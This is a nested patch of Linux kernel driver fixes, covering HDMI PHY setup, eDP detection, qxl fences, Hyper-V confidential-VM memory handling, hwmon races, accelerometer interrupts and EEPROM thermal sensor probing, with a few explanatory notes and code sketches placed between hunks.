+ 	.dwc_read = dw_hdmi_dwc_read,
+ 	.dwc_write = dw_hdmi_dwc_write,
++	.cntl0_init = 0x0,
++	.cntl1_init = PHY_CNTL1_INIT | PHY_INVERT,
++};
++
++static const struct meson_dw_hdmi_data meson_dw_hdmi_gxl_data = {
++	.top_read = dw_hdmi_top_read,
++	.top_write = dw_hdmi_top_write,
++	.dwc_read = dw_hdmi_dwc_read,
++	.dwc_write = dw_hdmi_dwc_write,
++	.cntl0_init = 0x0,
++	.cntl1_init = PHY_CNTL1_INIT,
+ };
+ 
+ static const struct meson_dw_hdmi_data meson_dw_hdmi_g12a_data = {
+@@ -622,6 +605,8 @@ static const struct meson_dw_hdmi_data meson_dw_hdmi_g12a_data = {
+ 	.top_write = dw_hdmi_g12a_top_write,
+ 	.dwc_read = dw_hdmi_g12a_dwc_read,
+ 	.dwc_write = dw_hdmi_g12a_dwc_write,
++	.cntl0_init = 0x000b4242, /* Bandgap */
++	.cntl1_init = PHY_CNTL1_INIT,
+ };
+ 
+ static void meson_dw_hdmi_init(struct meson_dw_hdmi *meson_dw_hdmi)
+@@ -656,6 +641,13 @@ static void meson_dw_hdmi_init(struct meson_dw_hdmi *meson_dw_hdmi)
+ 	meson_dw_hdmi->data->top_write(meson_dw_hdmi,
+ 				       HDMITX_TOP_CLK_CNTL, 0xff);
+ 
++	/* Enable normal output to PHY */
++	meson_dw_hdmi->data->top_write(meson_dw_hdmi, HDMITX_TOP_BIST_CNTL, BIT(12));
++
++	/* Setup PHY */
++	regmap_write(priv->hhi, HHI_HDMI_PHY_CNTL1, meson_dw_hdmi->data->cntl1_init);
++	regmap_write(priv->hhi, HHI_HDMI_PHY_CNTL0, meson_dw_hdmi->data->cntl0_init);
++
+ 	/* Enable HDMI-TX Interrupt */
+ 	meson_dw_hdmi->data->top_write(meson_dw_hdmi, HDMITX_TOP_INTR_STAT_CLR,
+ 				       HDMITX_TOP_INTR_CORE);
+@@ -883,11 +875,11 @@ static const struct dev_pm_ops meson_dw_hdmi_pm_ops = {
+ 
+ static const struct of_device_id meson_dw_hdmi_of_table[] = {
+ 	{ .compatible = "amlogic,meson-gxbb-dw-hdmi",
+-	  .data = &meson_dw_hdmi_gx_data },
++	  .data = &meson_dw_hdmi_gxbb_data },
+ 	{ .compatible = "amlogic,meson-gxl-dw-hdmi",
+-	  .data = &meson_dw_hdmi_gx_data },
++	  .data = &meson_dw_hdmi_gxl_data },
+ 	{ .compatible = "amlogic,meson-gxm-dw-hdmi",
+-	  .data = &meson_dw_hdmi_gx_data },
++	  .data = &meson_dw_hdmi_gxl_data },
+ 	{ .compatible = "amlogic,meson-g12a-dw-hdmi",
+ 	  .data = &meson_dw_hdmi_g12a_data },
+ 	{ }
+diff --git a/drivers/gpu/drm/nouveau/nouveau_dp.c b/drivers/gpu/drm/nouveau/nouveau_dp.c
+index 53185746fb3d1..17e1e23a780e0 100644
+--- a/drivers/gpu/drm/nouveau/nouveau_dp.c
++++ b/drivers/gpu/drm/nouveau/nouveau_dp.c
+@@ -109,12 +109,15 @@ nouveau_dp_detect(struct nouveau_connector *nv_connector,
+ 	u8 *dpcd = nv_encoder->dp.dpcd;
+ 	int ret = NOUVEAU_DP_NONE, hpd;
+ 
+-	/* If we've already read the DPCD on an eDP device, we don't need to
+-	 * reread it as it won't change
++	/* eDP ports don't support hotplugging, so there's no point in probing
++	 * an eDP port unless we haven't probed it before.
+ 	 */
+-	if (connector->connector_type == DRM_MODE_CONNECTOR_eDP &&
+-	    dpcd[DP_DPCD_REV] != 0)
+-		return NOUVEAU_DP_SST;
++	if (connector->connector_type == DRM_MODE_CONNECTOR_eDP) {
++		if (connector->status == connector_status_connected)
++			return NOUVEAU_DP_SST;
++		else if (connector->status == connector_status_disconnected)
++			return NOUVEAU_DP_NONE;
++	}
+ 
+ 	mutex_lock(&nv_encoder->dp.hpd_irq_lock);
+ 	if (mstm) {
+diff --git a/drivers/gpu/drm/panel/panel-ilitek-ili9341.c b/drivers/gpu/drm/panel/panel-ilitek-ili9341.c
+index 39dc40cf681f0..285e76818d84d 100644
+--- a/drivers/gpu/drm/panel/panel-ilitek-ili9341.c
++++ b/drivers/gpu/drm/panel/panel-ilitek-ili9341.c
+@@ -420,7 +420,7 @@ static int ili9341_dpi_prepare(struct drm_panel *panel)
+ 
+ 	ili9341_dpi_init(ili);
+ 
+-	return ret;
++	return 0;
+ }
+ 
+ static int ili9341_dpi_enable(struct drm_panel *panel)
+@@ -717,18 +717,18 @@ static int ili9341_probe(struct spi_device *spi)
+ 
+ 	reset = devm_gpiod_get_optional(dev, "reset", GPIOD_OUT_HIGH);
+ 	if (IS_ERR(reset))
+-		dev_err(dev, "Failed to get gpio 'reset'\n");
++		return dev_err_probe(dev, PTR_ERR(reset), "Failed to get gpio 'reset'\n");
+ 
+ 	dc = devm_gpiod_get_optional(dev, "dc", GPIOD_OUT_LOW);
+ 	if (IS_ERR(dc))
+-		dev_err(dev, "Failed to get gpio 'dc'\n");
++		return dev_err_probe(dev, PTR_ERR(dc), "Failed to get gpio 'dc'\n");
+ 
+ 	if (!strcmp(id->name, "sf-tc240t-9370-t"))
+ 		return ili9341_dpi_probe(spi, dc, reset);
+ 	else if (!strcmp(id->name, "yx240qv29"))
+ 		return ili9341_dbi_probe(spi, dc, reset);
+ 
+-	return -1;
++	return -ENODEV;
+ }
+ 
+ static void ili9341_remove(struct spi_device *spi)
+diff --git a/drivers/gpu/drm/qxl/qxl_release.c b/drivers/gpu/drm/qxl/qxl_release.c
+index 9febc8b73f09e..368d26da0d6a2 100644
+--- a/drivers/gpu/drm/qxl/qxl_release.c
++++ b/drivers/gpu/drm/qxl/qxl_release.c
+@@ -58,56 +58,16 @@ static long qxl_fence_wait(struct dma_fence *fence, bool intr,
+ 			   signed long timeout)
+ {
+ 	struct qxl_device *qdev;
+-	struct qxl_release *release;
+-	int count = 0, sc = 0;
+-	bool have_drawable_releases;
+ 	unsigned long cur, end = jiffies + timeout;
+ 
+ 	qdev = container_of(fence->lock, struct qxl_device, release_lock);
+-	release = container_of(fence, struct qxl_release, base);
+-	have_drawable_releases = release->type == QXL_RELEASE_DRAWABLE;
+-
+-retry:
+-	sc++;
+-
+-	if (dma_fence_is_signaled(fence))
+-		goto signaled;
+-
+-	qxl_io_notify_oom(qdev);
+-
+-	for (count = 0; count < 11; count++) {
+-		if (!qxl_queue_garbage_collect(qdev, true))
+-			break;
+-
+-		if (dma_fence_is_signaled(fence))
+-			goto signaled;
+-	}
+-
+-	if (dma_fence_is_signaled(fence))
+-		goto signaled;
+ 
+-	if (have_drawable_releases || sc < 4) {
+-		if (sc > 2)
+-			/* back off */
+-			usleep_range(500, 1000);
+-
+-		if (time_after(jiffies, end))
+-			return 0;
+-
+-		if (have_drawable_releases && sc > 300) {
+-			DMA_FENCE_WARN(fence,
+-				       "failed to wait on release %llu after spincount %d\n",
+-				       fence->context & ~0xf0000000, sc);
+-			goto signaled;
+-		}
+-		goto retry;
+-	}
+-	/*
+-	 * yeah, original sync_obj_wait gave up after 3 spins when
+-	 * have_drawable_releases is not set.
+-	 */
++	if (!wait_event_timeout(qdev->release_event,
++				(dma_fence_is_signaled(fence) ||
++				 (qxl_io_notify_oom(qdev), 0)),
++				timeout))
++		return 0;
+ 
+-signaled:
+ 	cur = jiffies;
+ 	if (time_after(cur, end))
+ 		return 0;
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_fence.c b/drivers/gpu/drm/vmwgfx/vmwgfx_fence.c
+index 66cc35dc223e7..95344735d00e6 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_fence.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_fence.c
+@@ -991,7 +991,7 @@ static int vmw_event_fence_action_create(struct drm_file *file_priv,
+ 	}
+ 
+ 	event->event.base.type = DRM_VMW_EVENT_FENCE_SIGNALED;
+-	event->event.base.length = sizeof(*event);
++	event->event.base.length = sizeof(event->event);
+ 	event->event.user_data = user_data;
+ 
+ 	ret = drm_event_reserve_init(dev, file_priv, &event->base, &event->event.base);
+diff --git a/drivers/gpu/host1x/bus.c b/drivers/gpu/host1x/bus.c
+index bdee16a0bb8e2..ba622fb5e4822 100644
+--- a/drivers/gpu/host1x/bus.c
++++ b/drivers/gpu/host1x/bus.c
+@@ -368,11 +368,6 @@ static int host1x_device_uevent(struct device *dev,
+ 	return 0;
+ }
+ 
+-static int host1x_dma_configure(struct device *dev)
+-{
+-	return of_dma_configure(dev, dev->of_node, true);
+-}
+-
+ static const struct dev_pm_ops host1x_device_pm_ops = {
+ 	.suspend = pm_generic_suspend,
+ 	.resume = pm_generic_resume,
+@@ -386,7 +381,6 @@ struct bus_type host1x_bus_type = {
+ 	.name = "host1x",
+ 	.match = host1x_device_match,
+ 	.uevent = host1x_device_uevent,
+-	.dma_configure = host1x_dma_configure,
+ 	.pm = &host1x_device_pm_ops,
+ };
+ 
+@@ -475,8 +469,6 @@ static int host1x_device_add(struct host1x *host1x,
+ 	device->dev.bus = &host1x_bus_type;
+ 	device->dev.parent = host1x->dev;
+ 
+-	of_dma_configure(&device->dev, host1x->dev->of_node, true);
+-
+ 	device->dev.dma_parms = &device->dma_parms;
+ 	dma_set_max_seg_size(&device->dev, UINT_MAX);
+ 
+diff --git a/drivers/hv/channel.c b/drivers/hv/channel.c
+index 56f7e06c673e4..47e1bd8de9fcf 100644
+--- a/drivers/hv/channel.c
++++ b/drivers/hv/channel.c
+@@ -153,7 +153,9 @@ void vmbus_free_ring(struct vmbus_channel *channel)
+ 	hv_ringbuffer_cleanup(&channel->inbound);
+ 
+ 	if (channel->ringbuffer_page) {
+-		__free_pages(channel->ringbuffer_page,
++		/* In a CoCo VM, leak the memory if it didn't get re-encrypted */
++		if (!channel->ringbuffer_gpadlhandle.decrypted)
++			__free_pages(channel->ringbuffer_page,
+ 			     get_order(channel->ringbuffer_pagecount
+ 				       << PAGE_SHIFT));
+ 		channel->ringbuffer_page = NULL;
+@@ -472,9 +474,18 @@ static int __vmbus_establish_gpadl(struct vmbus_channel *channel,
+ 		(atomic_inc_return(&vmbus_connection.next_gpadl_handle) - 1);
+ 
+ 	ret = create_gpadl_header(type, kbuffer, size, send_offset, &msginfo);
+-	if (ret)
++	if (ret) {
++		gpadl->decrypted = false;
+ 		return ret;
++	}
+ 
++	/*
++	 * Set the "decrypted" flag to true for the set_memory_decrypted()
++	 * success case. In the failure case, the encryption state of the
++	 * memory is unknown. Leave "decrypted" as true to ensure the
++	 * memory will be leaked instead of going back on the free list.
++	 */
++	gpadl->decrypted = true;
+ 	ret = set_memory_decrypted((unsigned long)kbuffer,
+ 				   PFN_UP(size));
+ 	if (ret) {
+@@ -563,9 +574,15 @@ static int __vmbus_establish_gpadl(struct vmbus_channel *channel,
+ 
+ 	kfree(msginfo);
+ 
+-	if (ret)
+-		set_memory_encrypted((unsigned long)kbuffer,
+-				     PFN_UP(size));
++	if (ret) {
++		/*
++		 * If set_memory_encrypted() fails, the decrypted flag is
++		 * left as true so the memory is leaked instead of being
++		 * put back on the free list.
++		 */
++		if (!set_memory_encrypted((unsigned long)kbuffer, PFN_UP(size)))
++			gpadl->decrypted = false;
++	}
+ 
+ 	return ret;
+ }
+@@ -886,6 +903,8 @@ int vmbus_teardown_gpadl(struct vmbus_channel *channel, struct vmbus_gpadl *gpad
+ 	if (ret)
+ 		pr_warn("Fail to set mem host visibility in GPADL teardown %d.\n", ret);
+ 
++	gpadl->decrypted = ret;
++
+ 	return ret;
+ }
+ EXPORT_SYMBOL_GPL(vmbus_teardown_gpadl);
+diff --git a/drivers/hwmon/corsair-cpro.c b/drivers/hwmon/corsair-cpro.c
+index fa6aa4fc8b521..486fb6a8c3566 100644
+--- a/drivers/hwmon/corsair-cpro.c
++++ b/drivers/hwmon/corsair-cpro.c
+@@ -16,6 +16,7 @@
+ #include <linux/module.h>
+ #include <linux/mutex.h>
+ #include <linux/slab.h>
++#include <linux/spinlock.h>
+ #include <linux/types.h>
+ 
+ #define USB_VENDOR_ID_CORSAIR			0x1b1c
+@@ -77,8 +78,11 @@
+ struct ccp_device {
+ 	struct hid_device *hdev;
+ 	struct device *hwmon_dev;
++	/* For reinitializing the completion below */
++	spinlock_t wait_input_report_lock;
+ 	struct completion wait_input_report;
+ 	struct mutex mutex; /* whenever buffer is used, lock before send_usb_cmd */
++	u8 *cmd_buffer;
+ 	u8 *buffer;
+ 	int target[6];
+ 	DECLARE_BITMAP(temp_cnct, NUM_TEMP_SENSORS);
+@@ -111,15 +115,23 @@ static int send_usb_cmd(struct ccp_device *ccp, u8 command, u8 byte1, u8 byte2,
+ 	unsigned long t;
+ 	int ret;
+ 
+-	memset(ccp->buffer, 0x00, OUT_BUFFER_SIZE);
+-	ccp->buffer[0] = command;
+-	ccp->buffer[1] = byte1;
+-	ccp->buffer[2] = byte2;
+-	ccp->buffer[3] = byte3;
+-
++	memset(ccp->cmd_buffer, 0x00, OUT_BUFFER_SIZE);
++	ccp->cmd_buffer[0] = command;
++	ccp->cmd_buffer[1] = byte1;
++	ccp->cmd_buffer[2] = byte2;
++	ccp->cmd_buffer[3] = byte3;
++
++	/*
++	 * Disable raw event parsing for a moment to safely reinitialize the
++	 * completion. Reinit is done because hidraw could have triggered
++	 * the raw event parsing and marked the ccp->wait_input_report
++	 * completion as done.
++	 */
++	spin_lock_bh(&ccp->wait_input_report_lock);
+ 	reinit_completion(&ccp->wait_input_report);
++	spin_unlock_bh(&ccp->wait_input_report_lock);
+ 
+-	ret = hid_hw_output_report(ccp->hdev, ccp->buffer, OUT_BUFFER_SIZE);
++	ret = hid_hw_output_report(ccp->hdev, ccp->cmd_buffer, OUT_BUFFER_SIZE);
+ 	if (ret < 0)
+ 		return ret;
+ 
+@@ -135,11 +147,12 @@ static int ccp_raw_event(struct hid_device *hdev, struct hid_report *report, u8
+ 	struct ccp_device *ccp = hid_get_drvdata(hdev);
+ 
+ 	/* only copy buffer when requested */
+-	if (completion_done(&ccp->wait_input_report))
+-		return 0;
+-
+-	memcpy(ccp->buffer, data, min(IN_BUFFER_SIZE, size));
+-	complete(&ccp->wait_input_report);
++	spin_lock(&ccp->wait_input_report_lock);
++	if (!completion_done(&ccp->wait_input_report)) {
++		memcpy(ccp->buffer, data, min(IN_BUFFER_SIZE, size));
++		complete_all(&ccp->wait_input_report);
++	}
++	spin_unlock(&ccp->wait_input_report_lock);
+ 
+ 	return 0;
+ }
+@@ -492,7 +505,11 @@ static int ccp_probe(struct hid_device *hdev, const struct hid_device_id *id)
+ 	if (!ccp)
+ 		return -ENOMEM;
+ 
+-	ccp->buffer = devm_kmalloc(&hdev->dev, OUT_BUFFER_SIZE, GFP_KERNEL);
++	ccp->cmd_buffer = devm_kmalloc(&hdev->dev, OUT_BUFFER_SIZE, GFP_KERNEL);
++	if (!ccp->cmd_buffer)
++		return -ENOMEM;
++
++	ccp->buffer = devm_kmalloc(&hdev->dev, IN_BUFFER_SIZE, GFP_KERNEL);
+ 	if (!ccp->buffer)
+ 		return -ENOMEM;
+ 
+@@ -510,7 +527,9 @@ static int ccp_probe(struct hid_device *hdev, const struct hid_device_id *id)
+ 
+ 	ccp->hdev = hdev;
+ 	hid_set_drvdata(hdev, ccp);
++
+ 	mutex_init(&ccp->mutex);
++	spin_lock_init(&ccp->wait_input_report_lock);
+ 	init_completion(&ccp->wait_input_report);
+ 
+ 	hid_device_io_start(hdev);
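The corsair-cpro change is a textbook fix for a reinit_completion()/complete() race: the raw-event path may complete the very completion object that send_usb_cmd() is about to reinitialize, so both sides now agree on a spinlock. A self-contained sketch of the idiom, with demo_* names standing in for the driver's fields:

#include <linux/completion.h>
#include <linux/errno.h>
#include <linux/jiffies.h>
#include <linux/spinlock.h>

static DEFINE_SPINLOCK(demo_lock);
static DECLARE_COMPLETION(demo_done);

/* Requester: reinit under the lock so a stale, unsolicited report
 * (e.g. one triggered via hidraw) cannot satisfy the upcoming wait. */
static int demo_send_and_wait(void)
{
	spin_lock_bh(&demo_lock);
	reinit_completion(&demo_done);
	spin_unlock_bh(&demo_lock);

	/* ... submit the command to the device here ... */

	if (!wait_for_completion_timeout(&demo_done, msecs_to_jiffies(200)))
		return -ETIMEDOUT;
	return 0;
}

/* Event side: consume the report only if a request is pending. */
static void demo_event(void)
{
	spin_lock(&demo_lock);
	if (!completion_done(&demo_done))
		complete_all(&demo_done);
	spin_unlock(&demo_lock);
}

Splitting cmd_buffer from buffer in the same patch closes the companion race: the response buffer can no longer be scribbled over while the next command is being built.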
+diff --git a/drivers/hwmon/pmbus/ucd9000.c b/drivers/hwmon/pmbus/ucd9000.c
+index 3daaf22378322..d6dfa268f31b8 100644
+--- a/drivers/hwmon/pmbus/ucd9000.c
++++ b/drivers/hwmon/pmbus/ucd9000.c
+@@ -80,11 +80,11 @@ struct ucd9000_debugfs_entry {
+  * It has been observed that the UCD90320 randomly fails register access when
+  * doing another access right on the back of a register write. To mitigate this
+  * make sure that there is a minimum delay between a write access and the
+- * following access. The 250us is based on experimental data. At a delay of
+- * 200us the issue seems to go away. Add a bit of extra margin to allow for
++ * following access. The 500us is based on experimental data. At a delay of
++ * 350us the issue seems to go away. Add a bit of extra margin to allow for
+  * system to system differences.
+  */
+-#define UCD90320_WAIT_DELAY_US 250
++#define UCD90320_WAIT_DELAY_US 500
+ 
+ static inline void ucd90320_wait(const struct ucd9000_data *data)
+ {
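The hunk only raises a constant, but the mechanism behind UCD90320_WAIT_DELAY_US is worth spelling out: stamp the time of the last write, then before the next access wait out whatever remains of the minimum gap. A hedged sketch of that scheme (demo_* names are illustrative, not the driver's):

#include <linux/delay.h>
#include <linux/ktime.h>

struct demo_dev {
	ktime_t last_write;	/* stamped after every write access */
};

static void demo_wait_after_write(const struct demo_dev *d,
				  unsigned int min_gap_us)
{
	s64 gap = ktime_us_delta(ktime_get(), d->last_write);

	if (gap < min_gap_us)
		udelay(min_gap_us - gap);
}

With this structure, back-to-back accesses pay at most min_gap_us, while naturally spaced accesses pay nothing.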
+diff --git a/drivers/iio/accel/mxc4005.c b/drivers/iio/accel/mxc4005.c
+index df600d2917c0a..ffae30e5eb5be 100644
+--- a/drivers/iio/accel/mxc4005.c
++++ b/drivers/iio/accel/mxc4005.c
+@@ -27,9 +27,13 @@
+ #define MXC4005_REG_ZOUT_UPPER		0x07
+ #define MXC4005_REG_ZOUT_LOWER		0x08
+ 
++#define MXC4005_REG_INT_MASK0		0x0A
++
+ #define MXC4005_REG_INT_MASK1		0x0B
+ #define MXC4005_REG_INT_MASK1_BIT_DRDYE	0x01
+ 
++#define MXC4005_REG_INT_CLR0		0x00
++
+ #define MXC4005_REG_INT_CLR1		0x01
+ #define MXC4005_REG_INT_CLR1_BIT_DRDYC	0x01
+ 
+@@ -113,7 +117,9 @@ static bool mxc4005_is_readable_reg(struct device *dev, unsigned int reg)
+ static bool mxc4005_is_writeable_reg(struct device *dev, unsigned int reg)
+ {
+ 	switch (reg) {
++	case MXC4005_REG_INT_CLR0:
+ 	case MXC4005_REG_INT_CLR1:
++	case MXC4005_REG_INT_MASK0:
+ 	case MXC4005_REG_INT_MASK1:
+ 	case MXC4005_REG_CONTROL:
+ 		return true;
+@@ -330,17 +336,13 @@ static int mxc4005_set_trigger_state(struct iio_trigger *trig,
+ {
+ 	struct iio_dev *indio_dev = iio_trigger_get_drvdata(trig);
+ 	struct mxc4005_data *data = iio_priv(indio_dev);
++	unsigned int val;
+ 	int ret;
+ 
+ 	mutex_lock(&data->mutex);
+-	if (state) {
+-		ret = regmap_write(data->regmap, MXC4005_REG_INT_MASK1,
+-				   MXC4005_REG_INT_MASK1_BIT_DRDYE);
+-	} else {
+-		ret = regmap_write(data->regmap, MXC4005_REG_INT_MASK1,
+-				   ~MXC4005_REG_INT_MASK1_BIT_DRDYE);
+-	}
+ 
++	val = state ? MXC4005_REG_INT_MASK1_BIT_DRDYE : 0;
++	ret = regmap_write(data->regmap, MXC4005_REG_INT_MASK1, val);
+ 	if (ret < 0) {
+ 		mutex_unlock(&data->mutex);
+ 		dev_err(data->dev, "failed to update reg_int_mask1");
+@@ -382,6 +384,14 @@ static int mxc4005_chip_init(struct mxc4005_data *data)
+ 
+ 	dev_dbg(data->dev, "MXC4005 chip id %02x\n", reg);
+ 
++	ret = regmap_write(data->regmap, MXC4005_REG_INT_MASK0, 0);
++	if (ret < 0)
++		return dev_err_probe(data->dev, ret, "writing INT_MASK0\n");
++
++	ret = regmap_write(data->regmap, MXC4005_REG_INT_MASK1, 0);
++	if (ret < 0)
++		return dev_err_probe(data->dev, ret, "writing INT_MASK1\n");
++
+ 	return 0;
+ }
+ 
+diff --git a/drivers/iio/imu/adis16475.c b/drivers/iio/imu/adis16475.c
+index 2d939773445d7..e2931ea8af1f4 100644
+--- a/drivers/iio/imu/adis16475.c
++++ b/drivers/iio/imu/adis16475.c
+@@ -1126,6 +1126,7 @@ static int adis16475_config_sync_mode(struct adis16475 *st)
+ 	struct device *dev = &st->adis.spi->dev;
+ 	const struct adis16475_sync *sync;
+ 	u32 sync_mode;
++	u16 val;
+ 
+ 	/* default to internal clk */
+ 	st->clk_freq = st->info->int_clk * 1000;
+@@ -1187,8 +1188,9 @@ static int adis16475_config_sync_mode(struct adis16475 *st)
+ 	 * I'm keeping this for simplicity and avoiding extra variables
+ 	 * in chip_info.
+ 	 */
++	val = ADIS16475_SYNC_MODE(sync->sync_mode);
+ 	ret = __adis_update_bits(&st->adis, ADIS16475_REG_MSG_CTRL,
+-				 ADIS16475_SYNC_MODE_MASK, sync->sync_mode);
++				 ADIS16475_SYNC_MODE_MASK, val);
+ 	if (ret)
+ 		return ret;
+ 
+diff --git a/drivers/infiniband/hw/qib/qib_fs.c b/drivers/infiniband/hw/qib/qib_fs.c
+index a973905afd132..182a89bb24ef4 100644
+--- a/drivers/infiniband/hw/qib/qib_fs.c
++++ b/drivers/infiniband/hw/qib/qib_fs.c
+@@ -440,6 +440,7 @@ static int remove_device_files(struct super_block *sb,
+ 		return PTR_ERR(dir);
+ 	}
+ 	simple_recursive_removal(dir, NULL);
++	dput(dir);
+ 	return 0;
+ }
+ 
+diff --git a/drivers/iommu/mtk_iommu.c b/drivers/iommu/mtk_iommu.c
+index 0ba2a63a9538a..576163f88a4a5 100644
+--- a/drivers/iommu/mtk_iommu.c
++++ b/drivers/iommu/mtk_iommu.c
+@@ -1570,6 +1570,7 @@ static const struct of_device_id mtk_iommu_of_ids[] = {
+ 	{ .compatible = "mediatek,mt8195-iommu-vpp",   .data = &mt8195_data_vpp},
+ 	{}
+ };
++MODULE_DEVICE_TABLE(of, mtk_iommu_of_ids);
+ 
+ static struct platform_driver mtk_iommu_driver = {
+ 	.probe	= mtk_iommu_probe,
+diff --git a/drivers/iommu/mtk_iommu_v1.c b/drivers/iommu/mtk_iommu_v1.c
+index a978220eb620e..5dd06bcb507f6 100644
+--- a/drivers/iommu/mtk_iommu_v1.c
++++ b/drivers/iommu/mtk_iommu_v1.c
+@@ -602,6 +602,7 @@ static const struct of_device_id mtk_iommu_v1_of_ids[] = {
+ 	{ .compatible = "mediatek,mt2701-m4u", },
+ 	{}
+ };
++MODULE_DEVICE_TABLE(of, mtk_iommu_v1_of_ids);
+ 
+ static const struct component_master_ops mtk_iommu_v1_com_ops = {
+ 	.bind		= mtk_iommu_v1_bind,
+diff --git a/drivers/md/md.c b/drivers/md/md.c
+index 788acc81e7a84..506c998c0ca59 100644
+--- a/drivers/md/md.c
++++ b/drivers/md/md.c
+@@ -2508,6 +2508,7 @@ static int bind_rdev_to_array(struct md_rdev *rdev, struct mddev *mddev)
+  fail:
+ 	pr_warn("md: failed to register dev-%s for %s\n",
+ 		b, mdname(mddev));
++	mddev_destroy_serial_pool(mddev, rdev, false);
+ 	return err;
+ }
+ 
+diff --git a/drivers/misc/eeprom/at24.c b/drivers/misc/eeprom/at24.c
+index 938c4f41b98c7..e664c1c852503 100644
+--- a/drivers/misc/eeprom/at24.c
++++ b/drivers/misc/eeprom/at24.c
+@@ -581,6 +581,31 @@ static unsigned int at24_get_offset_adj(u8 flags, unsigned int byte_len)
+ 	}
+ }
+ 
++static void at24_probe_temp_sensor(struct i2c_client *client)
++{
++	struct at24_data *at24 = i2c_get_clientdata(client);
++	struct i2c_board_info info = { .type = "jc42" };
++	int ret;
++	u8 val;
++
++	/*
++	 * Byte 2 has value 11 for DDR3; earlier versions don't
++	 * support the thermal sensor present flag
++	 */
++	ret = at24_read(at24, 2, &val, 1);
++	if (ret || val != 11)
++		return;
++
++	/* Byte 32, bit 7 is set if temp sensor is present */
++	ret = at24_read(at24, 32, &val, 1);
++	if (ret || !(val & BIT(7)))
++		return;
++
++	info.addr = 0x18 | (client->addr & 7);
++
++	i2c_new_client_device(client->adapter, &info);
++}
++
+ static int at24_probe(struct i2c_client *client)
+ {
+ 	struct regmap_config regmap_config = { };
+@@ -756,14 +781,6 @@ static int at24_probe(struct i2c_client *client)
+ 	}
+ 	pm_runtime_enable(dev);
+ 
+-	at24->nvmem = devm_nvmem_register(dev, &nvmem_config);
+-	if (IS_ERR(at24->nvmem)) {
+-		pm_runtime_disable(dev);
+-		if (!pm_runtime_status_suspended(dev))
+-			regulator_disable(at24->vcc_reg);
+-		return PTR_ERR(at24->nvmem);
+-	}
+-
+ 	/*
+ 	 * Perform a one-byte test read to verify that the chip is functional,
+ 	 * unless powering on the device is to be avoided during probe (i.e.
+@@ -779,6 +796,19 @@ static int at24_probe(struct i2c_client *client)
+ 		}
+ 	}
+ 
++	at24->nvmem = devm_nvmem_register(dev, &nvmem_config);
++	if (IS_ERR(at24->nvmem)) {
++		pm_runtime_disable(dev);
++		if (!pm_runtime_status_suspended(dev))
++			regulator_disable(at24->vcc_reg);
++		return dev_err_probe(dev, PTR_ERR(at24->nvmem),
++				     "failed to register nvmem\n");
++	}
++
++	/* If this is an SPD EEPROM, probe for DDR3 thermal sensor */
++	if (cdata == &at24_data_spd)
++		at24_probe_temp_sensor(client);
++
+ 	pm_runtime_idle(dev);
+ 
+ 	if (writable)
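The new at24_probe_temp_sensor() leans on the DDR3 SPD addressing scheme: the EEPROM of DIMM slot n answers at 0x50 | n and its JC-42.4-style thermal sensor at 0x18 | n, so the sensor address is derived rather than probed. A sketch of just that derivation (hypothetical helper name):

#include <linux/i2c.h>

static u8 demo_spd_sensor_addr(const struct i2c_client *spd_eeprom)
{
	/* the slot index lives in the low three bits of the address */
	return 0x18 | (spd_eeprom->addr & 7);
}

Moving devm_nvmem_register() after the one-byte test read in the same hunk also means a dead chip now fails probe before any nvmem interface becomes visible.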
+diff --git a/drivers/misc/mei/hw-me-regs.h b/drivers/misc/mei/hw-me-regs.h
+index 3390ff5111033..d3c03d4edbeff 100644
+--- a/drivers/misc/mei/hw-me-regs.h
++++ b/drivers/misc/mei/hw-me-regs.h
+@@ -115,6 +115,8 @@
+ #define MEI_DEV_ID_ARL_S      0x7F68  /* Arrow Lake Point S */
+ #define MEI_DEV_ID_ARL_H      0x7770  /* Arrow Lake Point H */
+ 
++#define MEI_DEV_ID_LNL_M      0xA870  /* Lunar Lake Point M */
++
+ /*
+  * MEI HW Section
+  */
+diff --git a/drivers/misc/mei/pci-me.c b/drivers/misc/mei/pci-me.c
+index a617f64a351dc..a4bdc41284582 100644
+--- a/drivers/misc/mei/pci-me.c
++++ b/drivers/misc/mei/pci-me.c
+@@ -122,6 +122,8 @@ static const struct pci_device_id mei_me_pci_tbl[] = {
+ 	{MEI_PCI_DEVICE(MEI_DEV_ID_ARL_S, MEI_ME_PCH15_CFG)},
+ 	{MEI_PCI_DEVICE(MEI_DEV_ID_ARL_H, MEI_ME_PCH15_CFG)},
+ 
++	{MEI_PCI_DEVICE(MEI_DEV_ID_LNL_M, MEI_ME_PCH15_CFG)},
++
+ 	/* required last entry */
+ 	{0, }
+ };
+diff --git a/drivers/net/dsa/mv88e6xxx/chip.c b/drivers/net/dsa/mv88e6xxx/chip.c
+index ba906dfab055c..517c50d11fbce 100644
+--- a/drivers/net/dsa/mv88e6xxx/chip.c
++++ b/drivers/net/dsa/mv88e6xxx/chip.c
+@@ -5677,7 +5677,7 @@ static const struct mv88e6xxx_info mv88e6xxx_table[] = {
+ 		.prod_num = MV88E6XXX_PORT_SWITCH_ID_PROD_6141,
+ 		.family = MV88E6XXX_FAMILY_6341,
+ 		.name = "Marvell 88E6141",
+-		.num_databases = 4096,
++		.num_databases = 256,
+ 		.num_macs = 2048,
+ 		.num_ports = 6,
+ 		.num_internal_phys = 5,
+@@ -6134,7 +6134,7 @@ static const struct mv88e6xxx_info mv88e6xxx_table[] = {
+ 		.prod_num = MV88E6XXX_PORT_SWITCH_ID_PROD_6341,
+ 		.family = MV88E6XXX_FAMILY_6341,
+ 		.name = "Marvell 88E6341",
+-		.num_databases = 4096,
++		.num_databases = 256,
+ 		.num_macs = 2048,
+ 		.num_internal_phys = 5,
+ 		.num_ports = 6,
+diff --git a/drivers/net/ethernet/broadcom/genet/bcmgenet.c b/drivers/net/ethernet/broadcom/genet/bcmgenet.c
+index c2a9913082153..f087a97164094 100644
+--- a/drivers/net/ethernet/broadcom/genet/bcmgenet.c
++++ b/drivers/net/ethernet/broadcom/genet/bcmgenet.c
+@@ -2,7 +2,7 @@
+ /*
+  * Broadcom GENET (Gigabit Ethernet) controller driver
+  *
+- * Copyright (c) 2014-2020 Broadcom
++ * Copyright (c) 2014-2024 Broadcom
+  */
+ 
+ #define pr_fmt(fmt)				"bcmgenet: " fmt
+@@ -2468,14 +2468,18 @@ static void umac_enable_set(struct bcmgenet_priv *priv, u32 mask, bool enable)
+ {
+ 	u32 reg;
+ 
++	spin_lock_bh(&priv->reg_lock);
+ 	reg = bcmgenet_umac_readl(priv, UMAC_CMD);
